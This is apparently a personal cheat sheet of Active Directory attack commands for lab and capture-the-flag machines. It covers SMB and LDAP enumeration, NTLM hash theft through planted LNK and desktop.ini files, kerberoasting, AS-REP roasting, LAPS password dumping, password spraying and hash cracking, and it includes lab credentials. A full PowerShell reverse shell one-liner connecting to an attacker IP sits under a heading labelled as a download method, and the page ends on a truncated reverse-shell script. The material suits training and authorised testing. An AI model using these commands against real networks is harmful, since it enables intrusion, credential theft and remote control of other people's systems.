Active Directory Cheat Sheet

Table of Contents

  1. SMB Enumeration

  2. User Enumeration

  3. LDAP/LAPS Enumeration

  4. Kerberos Attacks

  5. Credential Attacks

  6. BloodHound Collection

  7. File Transfer Methods

  8. Windows Post-Exploitation

  9. Privilege Escalation

  10. ADCS (Certificate Services)

  11. ACL Abuse

  12. Miscellaneous Tools

SMB Enumeration

SMB Share Listing

Always try multiple tools for listing shares:

# NetExec (formerly CrackMapExec)
nxc smb <ip> -u '' -p '' --shares
nxc smb <ip> -u 'Guest' -p '' --shares
nxc smb <ip> -u 'systemd' -p '' --shares

# SMBClient
smbclient -L //<IP_OR_DOMAIN> -N

# SMBMap
smbmap -H <ip>

Crawling Shares & Extracting Files

# Spider shares
nxc smb <target_ip> -u 'Guest' -p '' -M spider_plus

# View discovered files
cat <ip>.json | jq 'map_values(keys)'

# Download specific file
nxc smb <target_ip> -u 'Guest' -p '' --share <share_name> --get-file Dev/winrm_backup.zip winrm_back.zip

LNK File Attack (SMB Write Permission / NTLM Theft)

# Method 1: NetExec slinky module
nxc smb <ip> -u 'username' -p 'password' -M slinky -o SERVER=<attacker_ip> SHARES="<share_name>" NAME=malicious

# Method 2: desktop.ini file
# Create desktop.ini with content:
[.ShellClassInfo]
IconResource=\\10.10.14.9\aa
# Upload to writable share

# Method 3: ntlm_theft (generates multiple file types)
ntlm_theft -g all -s 10.10.14.14 -f systemd
# Then in SMB:
# recurse on
# prompt off
# mput *
# Start responder to catch hash

# Method 4: CVE-2025-24071
# https://github.com/Marcejr117/CVE-2025-24071_PoC
python poc.py <foldername> <LOCALIP>

# Method 5: SMB_Killer
# https://github.com/overgrowncarrot1/SMB_Killer
python3 smb_killer.py -l 192.168.132.92 -i tun0 -r 10.48.139.19 -a data -A -o hash

SMB Server (File Transfer)

# On Kali (with authentication)
smbserver.py -username systemd -password systemd share . -smb2support

# On Kali (without authentication)
impacket-smbserver share . -smb2support

# On Windows (connect to share)
net use \\<localIP>\share /u:systemd systemd
net use \\192.168.132.92\share /user:systemd systemd
cd \\<attacker_ip>\share\

# Cleanup
net use * /delete /y

User Enumeration

Username Enumeration via RID Brute

# Guest account
nxc smb <target_ip> -u 'Guest' -p '' --rid-brute

# Anonymous
nxc smb <target_ip> -u '' -p '' --rid-brute

# With credentials
nxc smb 10.10.10.10 -u 'SVC_APACHE' -p 'S@Ss!K@*t13' --users

Impacket Tools

# Lookup SID
impacket-lookupsid flight.htb/SVC_APACHE:'S@Ss!K@*t13'@10.10.11.187

# Get AD Users
impacket-GetADUsers -all -dc-ip 10.10.11.187 flight.htb/svc_apache
impacket-GetADUsers -all -dc-ip 10.10.10.182 cascade.local/''

Kerbrute (Kerberos User Enumeration)

kerbrute userenum --domain htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc <dc_ip>

# Example
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175

Nmap Kerberos Enumeration

nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} {IP}

# Example
nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="vault.offsec",userdb='/home/kali/Desktop/wordlists/seclists/Usernames/Names/names.txt' 10.10.10.100

Other Enumeration Tools

# enum4linux-ng
enum4linux-ng 10.10.11.187 -u 'SVC_APACHE' -p 'S@Ss!K@*t13' -U

# rpcclient
rpcclient -U 'flight.htb/SVC_APACHE%S@Ss!K@*t13' -W flight.htb -c "enumdomusers;quit" 10.10.11.187

# RPC Anonymous
rpcclient -U "" -N <ip>
# Inside rpcclient:
querydispinfo
enumdomusers

Extract Usernames from Website

# Method 1: Basic grep
curl windcorp.thm | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b"

# Method 2: Advanced extraction
curl -sL 'http://windcorp.thm' \
  | grep -E -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}" \
  | sort -u

# Method 3: Extract usernames only (before @)
curl -sL 'http://windcorp.thm' \
  | grep -E -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}" \
  | awk -F'@' '{print $1}' \
  | sort -u

# Method 4: Using lynx
curl -sL 'http://windcorp.thm' \
  | lynx -stdin -dump -nonumbers \
  | grep -E -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}" \
  | sort -u

# Method 5: Perl regex
curl -sL 'http://windcorp.thm' \
  | grep -Po '(?<![A-Za-z0-9._%+-])[A-Za-z0-9._%+-]+(?=@)' \
  | sort -u

Useful Wordlists

  • /usr/share/seclists/Usernames/Names/names.txt

  • /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

LDAP/LAPS Enumeration

Basic LDAP Enumeration

# Get namingContexts (Base DN)
ldapsearch -H ldap://$IP -x -s base namingContexts

# Enumerate all users
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" "(objectClass=user)" sAMAccountName

# Include descriptions (often contains passwords)
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" "(objectClass=person)" | grep -i pwd

# Enumerate all groups
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" "(objectClass=group)" cn

# Enumerate computer objects
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" "(objectClass=computer)" dNSHostName

# All attributes
ldapsearch -H ldap://$IP -x -b "DC=host,DC=local" "*"

# Dump to file
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" > ldap-anonymous

# Get just people
ldapsearch -H ldap://$IP -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people

# Sort and analyze
cat <filename> | sort | uniq -c | sort -n

Authenticated LDAP Searches

# Basic authenticated search
ldapsearch -x -LLL -H ldap://10.10.10.182 -D "[email protected]" -w 'rY4n5eva' -b "dc=cascade,dc=local" "(objectClass=user)" *

# User with group membership
ldapsearch -H ldap://10.10.11.76 -x -D "[email protected]" -w "HollowOct31Nyt" -b "DC=voleur,DC=htb" "(objectclass=user)" sAMAccountName memberOf

# All users with basic info
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=user)(sAMAccountName=*))" sAMAccountName displayName mail

# Users with descriptions (often passwords)
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=user)(description=*))" sAMAccountName description

# Domain Admins
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=user)(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local))" sAMAccountName

# Administrators group
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=user)(memberOf=CN=Administrators,CN=Users,DC=domain,DC=local))" sAMAccountName

# All computers
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(objectclass=computer)" name operatingSystem dNSHostName

# Servers
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=computer)(operatingSystem=*Server*))" name operatingSystem

# Unconstrained delegation
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(&(objectclass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" sAMAccountName

# Constrained delegation
ldapsearch -H ldap://<IP> -LLL -x -D "<USER>" -w "<PASS>" -b "DC=domain,DC=local" "(msDS-AllowedToDelegateTo=*)" sAMAccountName msDS-AllowedToDelegateTo

LAPS (Local Administrator Password Solution)

Query LAPS passwords for managed computers:

bash

# Method 1: ldapsearch
ldapsearch -D <user> -w <password> -o ldif-wrap=no -b 'dc=<domain>,dc=<tld>' -h <domain_controller> "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd

# Examples
ldapsearch -D [email protected] -w CrabSharkJellyfish192 -o ldif-wrap=no -b 'dc=hutch,dc=offsec' -H ldap://hutch.offsec "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd
ldapsearch -D [email protected] -w CrabSharkJellyfish192 -o ldif-wrap=no -b 'dc=hutch,dc=offsec' -h hutch.pg "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd
ldapsearch -D [email protected] -w CrabSharkJellyfish192 -o ldif-wrap=no -b 'dc=hutch,dc=offsec' -h hutch.offsec "(ms-MCS-AdmPwd=*)" ms-Mcs-AdmPwd

# Method 2: NetExec
nxc ldap hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -M laps

# Method 3: pyLAPS
./pyLAPS.py --action get -d "192.168.223.122" -u fmcsorley -p 'CrabSharkJellyfish192'

# Method 4: LAPSDumper
# https://github.com/n00py/LAPSDumper
git clone https://github.com/n00py/LAPSDumper
python laps.py -u 'raj' -p 'Password@1' -d 'ignite.local'

# Method 5: bloodyAD
bloodyAD --host "192.168.223.122" -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

# Method 6: ldap_shell
# https://github.com/PShlyundin/ldap_shell
git clone https://github.com/PShlyundin/ldap_shell
ldap_shell ignite.local/raj:Password@1 -dc-ip 192.168.1.48

# Method 7: Windows Registry Check
reg query "HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd" /s
# Should show: AdmPwdEnabled REG_DWORD 0x1

# Method 8: PowerShell
Get-DomainObject -Identity <dcname$>

Get GPP Passwords

Get-GPPPassword.py hutch.offsec/fmcsorley:'CrabSharkJellyfish192'@192.168.223.122

NetExec LDAP Modules

nxc smb 10.10.11.187 -u 'SVC_APACHE' -p 'S@Ss!K@*t13' --groups

Kerberos Attacks

Request TGT & Usage

# Request TGT
impacket-getTGT domain.htb/'username':'password'

# Export for use
export KRB5CCNAME=username.ccache

# Use with NetExec
nxc smb <ip> -u username -p password -k --shares

# Generate krb5.conf
nxc smb <ip> -u "username" -p "password" -k --generate-krb5-file krb5.conf
netexec smb 10.10.11.42 --generate-kerb-file /etc/krb5.conf

kerberoasting

# Basic kerberoasting
impacket-GetUserSPNs domain.htb/username:password -request-user administrator -outputfile hashes.txt
impacket-GetUserSPNs -request -dc-ip <ip> domain.htb/username

# Using NetExec
nxc ldap <dc_ip> -u username -p 'password' --kerberoasting output.txt

# Targeted kerberoasting
targetedKerberoast.py -v -d 'domain.htb' -u 'username' -p 'password' --dc-ip <>

# With ccache file
targetedKerberoast.py -k --dc-host dc.domain.htb -u username -d domain.htb

# Example with credentials
impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -request-user administrator -outputfile hashessss
nxc ldap 10.10.10.100 -u svc_tgs -p 'GPPstillStandingStrong2k18' --kerberoasting output.txt
targetedKerberoast.py -v -d 'active.htb' -u 'svc_tgs' -p 'GPPstillStandingStrong2k18'

# Crack the hashes
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat --show raw_hash

From Compromised Service Account (Rubeus)

.\Rubeus.exe kerberoast /nowrap

# Crack the hash
hashcat --show raw_hash
hashcat -m <mode> raw_hash /usr/share/wordlists/rockyou.txt

AS-REP Roasting

# With username list
GetNPUsers.py 'DOMAIN.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip <dc_ip>

# Alternative syntax
impacket-GetNPUsers domain.com/ -usersfile users.txt -no-pass

# Examples
GetNPUsers.py 'HTB.LOCAL/' -usersfile users -dc-ip 10.10.10.161 -format hashcat
GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
impacket-GetNPUsers klay.thm/ -usersfile users.txt -no-pass

# Using NetExec
nxc ldap 10.10.10.161 -u users -p '' --asreproast output.hash

Clock Skew Fix

sudo timedatectl set-ntp off
sudo rdate -n <target IP>

Credential Attacks

Password Spraying

# Try username as password
nxc smb <ip> -u users.txt -p users.txt --continue-on-success

# Example
crackmapexec smb 10.10.10.172 -u users -p users --continue-on-success

SSH Key Spray

nxc ssh IPs -u username -p '<passphrase if any>' --key-file <id_rsa> --continue-on-success

Hash Cracking

# Kerberoast
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

# NTLM
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt

# Show cracked
hashcat --show raw_hash

BloodHound Collection

bloodhound-python

# With Kerberos
bloodhound-python -u username -p password -k -ns <dc_ip> -c All -d domain.htb --zip

# Without Kerberos
bloodhound-python -u username -p password -ns <dc_ip> -c All -d domain.htb --zip

# Example
bloodhound-python -c all -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' --zip -ns 10.10.11.72

# Using NetExec
nxc smb $IP -u $user -p $pass --collection all --bloodhound --dns-server $ip

Rusthound

bash

rusthound-ce -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' --zip -c All

File Transfer Methods

SMB Server (Covered in SMB section above)

PowerShell Download

# Reverse shell (no nc.exe needed)
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Perl Download

perl -MHTTP::Tiny -e 'HTTP::Tiny->new->mirror("http://10.10.14.12/agent","file")'

Base64 Exfiltration

# Windows: Convert file to base64
[convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))

# Linux: Decode
echo '<base64_string>' | base64 -d > file.pdf

Finding SID

# Windows (dsquery)
dsquery computer -name APPSRV01 | dsget computer -sid

# PowerShell
Get-ADComputer -Identity "APPSRV01" -Properties SID | Select-Object Name, SID

# Whoami
whoami /user

# Impacket
impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb

DNS Enumeration

# Finding hostname via nslookup
nslookup
> server <target_ip>
> 127.0.0.1
# OR
> <target_ip>

# DNS Zone Transfer
dig axfr authority.htb @10.10.11.222

# DNS Recon
dnsrecon -d flight.htb -a -n 10.10.11.187

Stable Reverse Shell Script

# https://github.com/0xmrsecurity/OSCP/tree/main/Reverse%20connection/Windows/Simple-One

# Save as shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',4444

PreviousWelcome (Easy) — HackSmarter

Last updated